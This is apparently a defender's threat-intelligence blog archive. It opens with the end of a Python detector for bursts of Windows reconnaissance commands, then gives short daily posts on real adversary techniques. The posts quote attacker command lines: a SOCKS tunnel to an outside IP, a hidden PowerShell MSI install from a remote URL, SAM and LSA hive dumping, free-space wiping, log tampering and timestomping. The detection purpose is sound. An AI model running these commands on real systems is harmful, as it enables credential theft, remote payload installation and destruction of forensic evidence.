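    ("arp -a", re.compile(r"^arp\s+-a\b", re.I)),
    ("netstat -a", re.compile(r"^netstat\s+-a\b", re.I)),
    ("net share", re.compile(r"^net\s+share\b", re.I)),
]

EVENTS = [
    {"ts": "2025-01-12T08:00:01", "host": "WS01", "ppid": 4100, "cmdline": "systeminfo"},
    {"ts": "2025-01-12T08:00:02", "host": "WS01", "ppid": 4100, "cmdline": r"C:\Windows\System32\ipconfig.exe /all"},
    {"ts": "2025-01-12T08:00:03", "host": "WS01", "ppid": 4100, "cmdline": "ipconfig /displaydns"},
    {"ts": "2025-01-12T08:00:04", "host": "WS01", "ppid": 4100, "cmdline": "route print"},
    {"ts": "2025-01-12T08:00:05", "host": "WS01", "ppid": 4100, "cmdline": "arp -a"},
    {"ts": "2025-01-12T08:00:06", "host": "WS01", "ppid": 4100, "cmdline": "netstat -a -n"},
    {"ts": "2025-01-12T08:00:07", "host": "WS01", "ppid": 4100, "cmdline": '"C:\\Windows\\System32\\net.exe" share'},
    # Benign: an admin checking two things ten minutes apart.
    {"ts": "2025-01-12T09:10:00", "host": "WS02", "ppid": 5200, "cmdline": "ipconfig /all"},
    {"ts": "2025-01-12T09:20:00", "host": "WS02", "ppid": 5200, "cmdline": "systeminfo"},
    {"ts": "2025-01-12T09:21:00", "host": "WS02", "ppid": 5200, "cmdline": "notepad.exe"},
]


def classify(cmdline):
    """Map a command line to a recon label (or None), ignoring the image path
    and the .exe suffix so a full path to ipconfig.exe and a bare ipconfig agree."""
    parts = cmdline.strip().split(None, 1)
    if not parts:
        return None
    head = ntpath.basename(parts[0].strip('"')).lower()
    if head.endswith(".exe"):
        head = head[:-4]
    text = head + (" " + parts[1] if len(parts) > 1 else "")
    for label, rx in RECON:
        if rx.search(text):
            return label
    return None


def recon_bursts(events, min_distinct=4, window=timedelta(minutes=2)):
    """Return (host, ppid, labels, first_ts, last_ts) for each parent that ran
    at least min_distinct different recon commands inside one window."""
    per_parent = defaultdict(list)
    for ev in events:
        label = classify(ev["cmdline"])
        if label:
            per_parent[(ev["host"], ev["ppid"])].append((datetime.fromisoformat(ev["ts"]), label))
    bursts = []
    for (host, ppid), items in per_parent.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            in_window = [(ts, lbl) for ts, lbl in items[i:] if ts - start <= window]
            labels = sorted({lbl for _, lbl in in_window})
            if len(labels) >= min_distinct:
                bursts.append((host, ppid, labels, start.isoformat(), in_window[-1][0].isoformat()))
                break  # one alert per parent is enough
    return bursts


if __name__ == "__main__":
    for host, ppid, labels, first, last in recon_bursts(EVENTS):
        print(f"{host} ppid={ppid} {len(labels)} recon commands {first}..{last}: {', '.join(labels)}")
```

Counting distinct commands rather than raw events is what keeps a looping health-check script (the same ipconfig every minute) below the threshold while the seven-command burst from one cmd.exe parent fires immediately.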

011. Red Wolf Toolset Update

Hello everyone! The adversary toolset is always evolving, and today we'll look at another example demonstrating it. Recently Huntress published a report on Red Wolf (also known as RedCurl and Earth Kapre) attacks against several organizations in Canada. The report includes information on a tool we haven't observed being used by this activity cluster before. I'm talking about RPIVOT - a tool written in Python for SOCKS tunneling. To execute the tool, the adversary used the following command:

pcalua.exe -a conhost.exe -c --headless C:\ProgramData\ControlsUp\python.exe C:\ProgramData\ControlsUp\cl\cl.py --s 188.130.207[.]253 --p 10310

As you can see, we have lots of detection and hunting opportunities:
- The threat actors abused pcalua.exe (Program Compatibility Assistant) using the -a parameter for proxy execution.
- They also leveraged conhost.exe with the -c and --headless parameters to hide the child process window.
- The adversary used python.exe to execute a script from a suspicious folder - a good hunting candidate.
- Finally, RPIVOT h...

010. Do You Detect This Example of PowerShell Abuse?

Hello everyone! As you know, PowerShell can be used by the adversary to solve lots of problems, and it's almost impossible to cover all available procedures. Today we are going to look at another curious example of PowerShell abuse. Recently Recorded Future released a report on RedDelta (we track this cluster of espionage activity as Horned Werewolf), which targeted Taiwan, Mongolia and Southeast Asia with PlugX. Just like Sticky Werewolf, which we discussed a few days ago, the adversary leveraged malicious MSC files. These files abused PowerShell to install a malicious MSI file from a remote resource:

powershell.exe -w hidden ($ceed=new-object -comobject 'WindowsInstaller.Installer'); ($ceed.uilevel = 2); ($ceed.installproduct('https[:]//versaillesinfo[.]com/brjwcabz','REMOVE=ALL')); ($ceed.installproduct('https[:]//versaillesinfo[.]com/brjwcabz'))

Note that the malicious MSI file doesn't have an .msi extension, and that the first InstallProduct call with REMOVE=ALL uninstalls any previous copy before the second call installs it. The threat actors leveraged the Installer object to silently (Installer.UI...

009. Anti-Forensics and China-nexus

Hello everyone! Mandiant has identified zero-day exploitation of CVE-2025-0282 in the wild beginning in mid-December 2024. The vulnerability impacts Ivanti Connect Secure VPN appliances, and successful exploitation could result in unauthenticated remote code execution. This activity was attributed to a China-nexus cluster. Despite the fact that the threat actors used a zero-day to gain initial access, there are lots of detection and hunting opportunities for post-exploitation! Let's focus on anti-forensics techniques:
- The adversary leveraged dmesg with the -C parameter to clear the kernel ring buffer: dmesg -C
- Used sed with the -i parameter to delete specific lines from application debug logs in place: sed -i '/segfault/d' debuglog
- Deleted state dumps and any core dumps using rm with the -rf parameters: rm -rf /data/var/statedumps/*

As you can see, threat actors may make forensic examination a tough task. At the same time, anti-forensic methods are often quite common and easy to dete...

008. How Stealthy is Installation of an Advanced Backdoor?

Hello everyone! Yesterday I checked a fresh report by Kaspersky on the EAGERBEE backdoor, which has potential connections with the CoughingDown threat group. So, we already talked a bit about how noisy APT groups are in reality and how easy it is to detect malicious activity if you really want to, and this backdoor is another great example. Let's look at the installation routine described in the report. First of all, to hinder forensic analysis, the adversary leverages the timestomping technique abusing PowerShell:

powershell.exe -Command "='1/8/2019 9:57'; = 'C:\users\public\ntusers0.dat';(Get-Item ).creationtime = ;(Get-Item ).lastaccesstime = ;(Get-Item ).lastwritetime = "

Remember, PowerShell can be used to solve hundreds of tasks during the attack lifecycle, so make sure you have detection analytics for timestomping. Another technique used during the installation routine - changing file attributes to hide them abusing attrib.exe:

attrib.exe +s +h +a C:\users\publ...

007. A Curious Case of Microsoft Management Console Abuse

Hello everyone! As you know, phishing emails are still the most common way to deliver malware. Malicious attachments may include Microsoft Word documents, Microsoft Excel spreadsheets, executables with a double extension, LNK files and many others. Some time ago we observed Sticky Werewolf using MSC files to deliver a Sliver implant to the compromised system. Windows MSC files are used by the Microsoft Management Console to manage various aspects of the operating system or to create custom views of commonly accessed tools. Despite the fact that it's not a very common file type among adversaries, the installation routine is quite noisy and offers defenders lots of detection and hunting opportunities, for example:
- Execution of MSC files from suspicious locations with mmc.exe ( mmc.exe C:\Users\Victim\AppData\Local\Temp\17_09_2024.msc )
- Certutil abuse for decoding MSC files ( certutil -decode """C:\Users\Victim\AppData\Local\Temp\17_09_2024.msc""" C:\Users\Victim\AppDat...

006. They Will Steal All Passwords from Any App with This Tool

Hello everyone! As you know, almost any attack includes a credential access stage. I think many of you are well aware of tools like Mimikatz or LaZagne. But threat actors may be much more creative in their attempts to obtain credential material. For example, recently we saw threat actors involved in ransomware attacks in the CIS actively using XenArmor All-In-One Password Recovery Pro. It's a legitimate password recovery tool which can recover data from 270+ applications. Not bad, right? Of course, it's used beyond the CIS as well. For example, it was used by the ransomware gang behind AvosLocker. Also, it's widely used as a malware module, for example, in XWorm. Currently, it's detected quite well by various antivirus software, as seen on VirusTotal. Also, here are some detection and hunting tips if you don't trust your security software:
- Look for files with "XenArmor All-In-One Password Recovery Pro", "All-In-One Password Recovery Pro...

005. Is It Difficult to Spot a Russian APT?

Hello everyone! Let's continue to talk about APTs. I think many of you read this report by Volexity, where they introduced the Nearest Neighbor Attack. APTs often use very sophisticated techniques to obtain initial access to the target network, and the Nearest Neighbor Attack is a good example. But it's almost impossible to be very sophisticated throughout the attack lifecycle. What does it mean for defenders? Detection opportunities! For example, the adversary attempted to extract the Security Account Manager (SAM) database from the registry with reg.exe, together with the SYSTEM hive (which holds the boot key needed to decrypt the SAM) and the S
ECURITY hive (LSA secrets and cached credentials):

reg save hklm\sam C:\ProgramData\sam.save
reg save hklm\security C:\ProgramData\security.save
reg save hklm\system C:\ProgramData\system.save

Quite noisy and suspicious behaviour, isn't it? Another noisy technique is abusing cipher.exe:

cmd.exe /c cipher /W:C

cipher /W overwrites the free space on the volume, so abusing this tool allowed the threat actors to wipe deleted data and make it difficult for incident responders to recover their toolset. It's not the fir...

004. Are You Forensicating Here or What?

Hello everyone! During incident response engagements we often use various forensic tools, right? For example, to dump memory. But do you know that adversaries may do the same with the same tools? Why? Because dumping LSASS is way too noisy nowadays. And yes, you can extract credentials from a full memory dump as well. We saw this approach in the wild for the first time responding to Gremlin Wolf (also known as OldGremlin and TinyScouts). This ransomware gang used WinPmem to dump the compromised system's memory and access available credentials. It's not the only example of forensic tool abuse. For example, the Lorenz ransomware gang leveraged Magnet RAM Capture to obtain a memory dump. In some cases threat actors even used another forensic tool - Volatility - to extract credentials from the memory dump directly on the compromised host. As you can see, forensic tools, just like many other legitimate tools, may be used by an adversary to solve various problems. There are even more examples! D...

003. Are they that advanced? Spotlighting Salt Typhoon

Hello everyone! I'm not sure about you, but I often ask myself one question: "Are Advanced Persistent Threats that advanced?". We are tracking lots of adversaries, mostly those targeting the CIS. I also read lots and lots of public reports. And you know what? Yes, many modern threat actors use custom malware, for example, but at the same time their behaviors are quite easy to detect, especially if you have good threat intelligence sources. So, in the "Are they that advanced?" series we'll look at various APTs from the headlines in order to find low-hanging fruit for detection and hunting. Let's start with Salt Typhoon (yes, I like Microsoft's naming taxonomy), which, according to the news, successfully compromised at least eight U.S. telecommunication networks, including AT&T and Verizon. First of all, the threat actors use well-known vulnerabilities in public-facing applications, for example, Ivanti Connect Secure VPN and Microsoft Exchange. I'm sure, it...

002. Beyond Good Old Run Key

Hello everyone! Today we're going to talk about a very common sub-technique - T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder. But let's look at an interesting example, of course. I think almost any malware family uses this sub-technique for persistence. Why? Because Run keys and startup folders are also commonly used by legitimate software to autorun, so this way adversaries may blend in with the compromised environment. If we look at the MITRE ATT&CK page for this sub-technique, we may notice that there are more interesting registry keys. For example, the one on the screenshot. It's less common, of course, but recently we observed it being used by the Paper Werewolf activity cluster. And there's quite an interesting thing about it. On one hand, using this key is not very common and may allow adversaries to bypass certain defenses, but on the other hand, the fact it's not very common makes such behavior really easy to detect! By the way, if...

001. The Zeltser Challenge

Hello everyone! Happy New Year! New year - new challenges! So, a few weeks ago David Cowen reminded me about the Zeltser challenge. What's the point? You must blog every day for a year to push yourself to research and write. Sounds cool, right? Dave suggested starting the challenge with him on 1/1/25, and that's why you are reading this post! So, what am I going to share here? I'm a big fan of the intelligence-led approach to cyber defense, so every day we'll look at this or that technique (or sub-technique) leveraged by real adversaries, so we can learn more about our enemies. We'll look both at public reporting and private findings by the BI.ZONE Threat Intelligence team. Stay tuned, and see you tomorrow!